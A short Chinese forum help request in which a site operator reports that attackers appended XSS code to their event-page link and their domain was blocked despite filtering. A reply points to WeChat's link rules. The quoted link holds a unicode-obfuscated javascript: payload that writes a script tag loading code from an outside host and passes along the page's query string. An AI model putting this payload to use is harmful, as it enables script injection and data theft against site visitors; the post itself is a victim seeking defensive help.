求助,有人恶意在我们正常链接后加xss攻击代码,程序不会执行该代码,但域名还是被封禁,需要怎么处理?
发布于 6 年前 作者 ligao 5328 次浏览 来自 问答

我们已经把恶意执行代码做了过滤,申请解封还是不通过

问题链接:https://chinaevent.microsoft.com/app/meetings/MeetingPc/Detail/indoeffax/ursdp?active=5&channel_id=74&channel_name=CSDN&id=406poiu987'?location.href=`ja\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003a\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u005b\u0027\u0077\u0072\u0069\u0074\u0065\u0027\u005d\u0028\u0027\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003d\u002f\u002f\u007a\u0032\u002e\u0064\u0075\u006f\u0078\u006a\u002e\u0063\u006f\u006d\u002f\u0078\u0027\u002b\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0073\u0065\u0061\u0072\u0063\u0068\u002b\u0027\u003e\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0027\u0029\u003b`:'&pf_type=3&pf_uid=5407_3&source=2&tag_id=a697bc6da3af9886&U2FsdGVkX1zzdsgbfh2FCNPw9skDRS2Kzzdsgbfh2FbSS6fJEtHK6XdXVMKoFGVJwqeUhOWJuJ1QthbUC6RBxnmRQQBOCy7VF3TbTuBaQjN9CwTsDnzzdsgbfh2FSJ7RxgEJOUgbmD5LQru7glA8BTReuzY#1606971084380

当用户访问问题链接,系统过滤后跳转地址:https://chinaevent.microsoft.com/error/index?num=110

1 回复

http://weixin.qq.com/cgi-bin/readtemplate?t=weixin_external_links_content_management_specification

回到顶部